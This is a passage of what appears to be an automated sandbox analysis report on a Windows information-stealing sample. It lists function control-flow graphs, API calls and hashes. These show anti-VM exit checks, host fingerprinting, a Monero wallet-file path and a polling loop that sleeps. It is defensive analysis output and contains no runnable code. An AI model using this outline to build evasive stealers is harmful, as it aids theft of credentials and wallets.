                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: HttpQueryInfoA$InternetSetOptionA
                  • API String ID: 2238633743-1775429166
                  • Opcode ID: 0a11f06740e9870bc503db2769d60b32cd3844176044b9029eb9d9732d7db3fe
                  • Instruction ID: d5fd0f3aa8f2992042a4003268dc264bb1be57af3353ac028404aed7d9c77eb5
                  • Opcode Fuzzy Hash: 0a11f06740e9870bc503db2769d60b32cd3844176044b9029eb9d9732d7db3fe
                  • Instruction Fuzzy Hash: 00624FBD5C0200AFD368DFAAED8C9563BF9F74E22170D453BA605E3224D639944BDB12
                  Function 00C15510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 858 c15510-c15577 call c15ad0 call c1a820 * 3 call c1a740 * 4 874 c1557c-c15583 858->874 875 c15585-c155b6 call c1a820 call c1a7a0 call c01590 call c151f0 874->875 876 c155d7-c1564c call c1a740 * 2 call c01590 call c152c0 call c1a8a0 call c1a800 call c1aad0 StrCmpCA 874->876 892 c155bb-c155d2 call c1a8a0 call c1a800 875->892 902 c15693-c156a9 call c1aad0 StrCmpCA 876->902 906 c1564e-c1568e call c1a7a0 call c01590 call c151f0 call c1a8a0 call c1a800 876->906 892->902 907 c157dc-c15844 call c1a8a0 call c1a820 * 2 call c01670 call c1a800 * 4 call c16560 call c01550 902->907 908 c156af-c156b6 902->908 906->902 1038 c15ac3-c15ac6 907->1038 911 c157da-c1585f call c1aad0 StrCmpCA 908->911 912 c156bc-c156c3 908->912 931 c15991-c159f9 call c1a8a0 call c1a820 * 2 call c01670 call c1a800 * 4 call c16560 call c01550 911->931 932 c15865-c1586c 911->932 916 c156c5-c15719 call c1a820 call c1a7a0 call c01590 call c151f0 call c1a8a0 call c1a800 912->916 917 c1571e-c15793 call c1a740 * 2 call c01590 call c152c0 call c1a8a0 call c1a800 call c1aad0 StrCmpCA 912->917 916->911 917->911 1017 c15795-c157d5 call c1a7a0 call c01590 call c151f0 call c1a8a0 call c1a800 917->1017 931->1038 938 c15872-c15879 932->938 939 c1598f-c15a14 call c1aad0 StrCmpCA 932->939 947 c158d3-c15948 call c1a740 * 2 call c01590 call c152c0 call c1a8a0 call c1a800 call c1aad0 StrCmpCA 938->947 948 c1587b-c158ce call c1a820 call c1a7a0 call c01590 call c151f0 call c1a8a0 call c1a800 938->948 968 c15a16-c15a21 Sleep 939->968 969 c15a28-c15a91 call c1a8a0 call c1a820 * 2 call c01670 call c1a800 * 4 call c16560 call c01550 939->969 947->939 1043 c1594a-c1598a call c1a7a0 call c01590 call c151f0 call c1a8a0 call c1a800 947->1043 948->939 968->874 969->1038 1017->911 1043->939
                  APIs
                    • Part of subcall function 00C1A820: lstrlen.KERNEL32(00C04F05,?,?,00C04F05,00C20DDE), ref: 00C1A82B
                    • Part of subcall function 00C1A820: lstrcpy.KERNEL32(00C20DDE,00000000), ref: 00C1A885
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C15644
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C156A1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C15857
                    • Part of subcall function 00C1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C1A7E6
                    • Part of subcall function 00C151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C15228
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                    • Part of subcall function 00C152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C15318
                    • Part of subcall function 00C152C0: lstrlen.KERNEL32(00000000), ref: 00C1532F
                    • Part of subcall function 00C152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00C15364
                    • Part of subcall function 00C152C0: lstrlen.KERNEL32(00000000), ref: 00C15383
                    • Part of subcall function 00C152C0: lstrlen.KERNEL32(00000000), ref: 00C153AE
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C1578B
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C15940
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C15A0C
                  • Sleep.KERNEL32(0000EA60), ref: 00C15A1B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen$Sleep
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 507064821-2791005934
                  • Opcode ID: 775d609c999740530ed2d41003c3a3e8ee9d78b37a6be680448881a023f17635
                  • Instruction ID: 73878415c728e23a30a26d47de10559d85dd49f00915e5e722ac2603d6c3ad01
                  • Opcode Fuzzy Hash: 775d609c999740530ed2d41003c3a3e8ee9d78b37a6be680448881a023f17635
                  • Instruction Fuzzy Hash: 98E18171910104AADB14FBB1DD52EFD7338AF96310F548128B406661D2EF34AB8EFB92
                  Function 00C117A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1069 c117a0-c117cd call c1aad0 StrCmpCA 1072 c117d7-c117f1 call c1aad0 1069->1072 1073 c117cf-c117d1 ExitProcess 1069->1073 1077 c117f4-c117f8 1072->1077 1078 c119c2-c119cd call c1a800 1077->1078 1079 c117fe-c11811 1077->1079 1081 c11817-c1181a 1079->1081 1082 c1199e-c119bd 1079->1082 1084 c11821-c11830 call c1a820 1081->1084 1085 c11849-c11858 call c1a820 1081->1085 1086 c118ad-c118be StrCmpCA 1081->1086 1087 c118cf-c118e0 StrCmpCA 1081->1087 1088 c1198f-c11999 call c1a820 1081->1088 1089 c118f1-c11902 StrCmpCA 1081->1089 1090 c11951-c11962 StrCmpCA 1081->1090 1091 c11970-c11981 StrCmpCA 1081->1091 1092 c11913-c11924 StrCmpCA 1081->1092 1093 c11932-c11943 StrCmpCA 1081->1093 1094 c11835-c11844 call c1a820 1081->1094 1095 c1185d-c1186e StrCmpCA 1081->1095 1096 c1187f-c11890 StrCmpCA 1081->1096 1082->1077 1084->1082 1085->1082 1105 c118c0-c118c3 1086->1105 1106 c118ca 1086->1106 1107 c118e2-c118e5 1087->1107 1108 c118ec 1087->1108 1088->1082 1109 c11904-c11907 1089->1109 1110 c1190e 1089->1110 1115 c11964-c11967 1090->1115 1116 c1196e 1090->1116 1118 c11983-c11986 1091->1118 1119 c1198d 1091->1119 1111 c11930 1092->1111 1112 c11926-c11929 1092->1112 1113 c11945-c11948 1093->1113 1114 c1194f 1093->1114 1094->1082 1101 c11870-c11873 1095->1101 1102 c1187a 1095->1102 1103 c11892-c1189c 1096->1103 1104 c1189e-c118a1 1096->1104 1101->1102 1102->1082 1122 c118a8 1103->1122 1104->1122 1105->1106 1106->1082 1107->1108 1108->1082 1109->1110 1110->1082 1111->1082 1112->1111 1113->1114 1114->1082 1115->1116 1116->1082 1118->1119 1119->1082 1122->1082
                  APIs
                  • StrCmpCA.SHLWAPI(00000000,block), ref: 00C117C5
                  • ExitProcess.KERNEL32 ref: 00C117D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess
                  • String ID: block
                  • API String ID: 621844428-2199623458
                  • Opcode ID: 7edca8a6c935f9e49153a20548ded1bd94eecae900248ea2f1b233a100aeddd5
                  • Instruction ID: 15cbb35ee785410be6af3870bce0c52a275f62bfff3e9476d8cf54c203c792c3
                  • Opcode Fuzzy Hash: 7edca8a6c935f9e49153a20548ded1bd94eecae900248ea2f1b233a100aeddd5
                  • Instruction Fuzzy Hash: 3351B2B4A00209EFDB04DFA1D954BFE77B5FF45304F148059E91167281D774EA82EB62
                  Function 00C17500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1124 c17500-c1754a GetWindowsDirectoryA 1125 c17553-c175c7 GetVolumeInformationA call c18d00 * 3 1124->1125 1126 c1754c 1124->1126 1133 c175d8-c175df 1125->1133 1126->1125 1134 c175e1-c175fa call c18d00 1133->1134 1135 c175fc-c17617 GetProcessHeap RtlAllocateHeap 1133->1135 1134->1133 1137 c17619-c17626 call c1a740 1135->1137 1138 c17628-c17658 wsprintfA call c1a740 1135->1138 1145 c1767e-c1768e 1137->1145 1138->1145
                  APIs
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00C17542
                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C1757F
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C17603
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C1760A
                  • wsprintfA.USER32 ref: 00C17640
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                  • String ID: :$C$\
                  • API String ID: 1544550907-3809124531
                  • Opcode ID: 201ce0bf35e2670532299f7b3608908712682f84b6bdadc13987a5549f0cccd1
                  • Instruction ID: 651d460d1f6eb23c0d59a58f7f4ab165307619f65254b380f176af6403b7843f
                  • Opcode Fuzzy Hash: 201ce0bf35e2670532299f7b3608908712682f84b6bdadc13987a5549f0cccd1
                  • Instruction Fuzzy Hash: 7E41AEB1944248ABDB10DF94DC45BEEBBB8AB09710F140199F50967280DB78AA88DBA1
                  Function 00C169F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00C19860: GetProcAddress.KERNEL32(74DD0000,01798E38), ref: 00C198A1
                    • Part of subcall function 00C19860: GetProcAddress.KERNEL32(74DD0000,01798DA8), ref: 00C198BA
                    • Part of subcall function 00C19860: GetProcAddress.KERNEL32(74DD0000,01798F88), ref: 00C198D2
                    • Part of subcall function 00C19860: GetProcAddress.KERNEL32(74DD0000,01798EB0), ref: 00C198EA
                    • Part of subcall function 00C19860: GetProcAddress.KERNEL32(74DD0000,01798D90), ref: 00C19903
                    • Part of subcall function 00C19860: GetProcAddress.KERNEL32(74DD0000,01799480), ref: 00C1991B
                    • Part of subcall function 00C19860: GetProcAddress.KERNEL32(74DD0000,01783DC0), ref: 00C19933
                    • Part of subcall function 00C19860: GetProcAddress.KERNEL32(74DD0000,01783EE0), ref: 00C1994C
                    • Part of subcall function 00C19860: GetProcAddress.KERNEL32(74DD0000,01798F70), ref: 00C19964
                    • Part of subcall function 00C19860: GetProcAddress.KERNEL32(74DD0000,01798DC0), ref: 00C1997C
                    • Part of subcall function 00C19860: GetProcAddress.KERNEL32(74DD0000,01798E80), ref: 00C19995
                    • Part of subcall function 00C19860: GetProcAddress.KERNEL32(74DD0000,01798D78), ref: 00C199AD
                    • Part of subcall function 00C19860: GetProcAddress.KERNEL32(74DD0000,01783E80), ref: 00C199C5
                    • Part of subcall function 00C19860: GetProcAddress.KERNEL32(74DD0000,01798FA0), ref: 00C199DE
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C011D0: ExitProcess.KERNEL32 ref: 00C01211
                    • Part of subcall function 00C01160: GetSystemInfo.KERNEL32(?), ref: 00C0116A
                    • Part of subcall function 00C01160: ExitProcess.KERNEL32 ref: 00C0117E
                    • Part of subcall function 00C01110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00C0112B
                    • Part of subcall function 00C01110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00C01132
                    • Part of subcall function 00C01110: ExitProcess.KERNEL32 ref: 00C01143
                    • Part of subcall function 00C01220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00C0123E
                    • Part of subcall function 00C01220: __aulldiv.LIBCMT ref: 00C01258
                    • Part of subcall function 00C01220: __aulldiv.LIBCMT ref: 00C01266
                    • Part of subcall function 00C01220: ExitProcess.KERNEL32 ref: 00C01294
                    • Part of subcall function 00C16770: GetUserDefaultLangID.KERNEL32 ref: 00C16774
                    • Part of subcall function 00C01190: ExitProcess.KERNEL32 ref: 00C011C6
                    • Part of subcall function 00C17850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C011B7), ref: 00C17880
                    • Part of subcall function 00C17850: RtlAllocateHeap.NTDLL(00000000), ref: 00C17887
                    • Part of subcall function 00C17850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C1789F
                    • Part of subcall function 00C178E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C17910
                    • Part of subcall function 00C178E0: RtlAllocateHeap.NTDLL(00000000), ref: 00C17917
                    • Part of subcall function 00C178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00C1792F
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,017994D0,?,00C2110C,?,00000000,?,00C21110,?,00000000,00C20AEF), ref: 00C16ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C16AE8
                  • CloseHandle.KERNEL32(00000000), ref: 00C16AF9
                  • Sleep.KERNEL32(00001770), ref: 00C16B04
                  • CloseHandle.KERNEL32(?,00000000,?,017994D0,?,00C2110C,?,00000000,?,00C21110,?,00000000,00C20AEF), ref: 00C16B1A
                  • ExitProcess.KERNEL32 ref: 00C16B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                  • String ID:
                  • API String ID: 2525456742-0
                  • Opcode ID: 1291fa155b195164fb9024f01f7674ea3330dfeabdb636a8f51243f4f529d375
                  • Instruction ID: babbbb12c746e7ffbe6f410abb04a669412695050effd844dc02a34236ccfe56
                  • Opcode Fuzzy Hash: 1291fa155b195164fb9024f01f7674ea3330dfeabdb636a8f51243f4f529d375
                  • Instruction Fuzzy Hash: 5B314371940208ABEB04FBF1DC56FEE7738AF06350F144528F612A21C2DF705986F6A2
                  Function 00C01220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1204 c01220-c01247 call c189b0 GlobalMemoryStatusEx 1207 c01273-c0127a 1204->1207 1208 c01249-c01271 call c1da00 * 2 1204->1208 1210 c01281-c01285 1207->1210 1208->1210 1212 c01287 1210->1212 1213 c0129a-c0129d 1210->1213 1215 c01292-c01294 ExitProcess 1212->1215 1216 c01289-c01290 1212->1216 1216->1213 1216->1215
                  APIs
                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00C0123E
                  • __aulldiv.LIBCMT ref: 00C01258
                  • __aulldiv.LIBCMT ref: 00C01266
                  • ExitProcess.KERNEL32 ref: 00C01294
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                  • String ID: @
                  • API String ID: 3404098578-2766056989
                  • Opcode ID: 95ce03252061e0d0e8330a63867170ff73698a053174b17c69f43161da9b5b9d
                  • Instruction ID: 067bd80a24980570d895fc138421b6650ba7376c2d53ecf05f43a0f226967913
                  • Opcode Fuzzy Hash: 95ce03252061e0d0e8330a63867170ff73698a053174b17c69f43161da9b5b9d
                  • Instruction Fuzzy Hash: FB016DB0D84308FAEB10DBE0CC49B9EBB78AF04701F288058FB05B62C0D7749686D799
                  Function 00C16AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1218 c16af3 1219 c16b0a 1218->1219 1221 c16aba-c16ad7 call c1aad0 OpenEventA 1219->1221 1222 c16b0c-c16b22 call c16920 call c15b10 CloseHandle ExitProcess 1219->1222 1227 c16af5-c16b04 CloseHandle Sleep 1221->1227 1228 c16ad9-c16af1 call c1aad0 CreateEventA 1221->1228 1227->1219 1228->1222
                  APIs
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,017994D0,?,00C2110C,?,00000000,?,00C21110,?,00000000,00C20AEF), ref: 00C16ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C16AE8
                  • CloseHandle.KERNEL32(00000000), ref: 00C16AF9
                  • Sleep.KERNEL32(00001770), ref: 00C16B04
                  • CloseHandle.KERNEL32(?,00000000,?,017994D0,?,00C2110C,?,00000000,?,00C21110,?,00000000,00C20AEF), ref: 00C16B1A
                  • ExitProcess.KERNEL32 ref: 00C16B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                  • String ID:
                  • API String ID: 941982115-0
                  • Opcode ID: 017db36a369686b7ea03559b377e81a62119db40d087cdc5fb1e5d288150804c
                  • Instruction ID: 2288466430cf1ccc8b4d4f174864b04df074273d121c5f99942dc4a19666712e
                  • Opcode Fuzzy Hash: 017db36a369686b7ea03559b377e81a62119db40d087cdc5fb1e5d288150804c
                  • Instruction Fuzzy Hash: 84F05E34A84209AFE710ABA1DC0ABFD7B34EF06751F144525F512B11C1CBB05585FA66
                  Function 00C047B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C04839
                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00C04849
                  Strings
                  Memory Dump Source
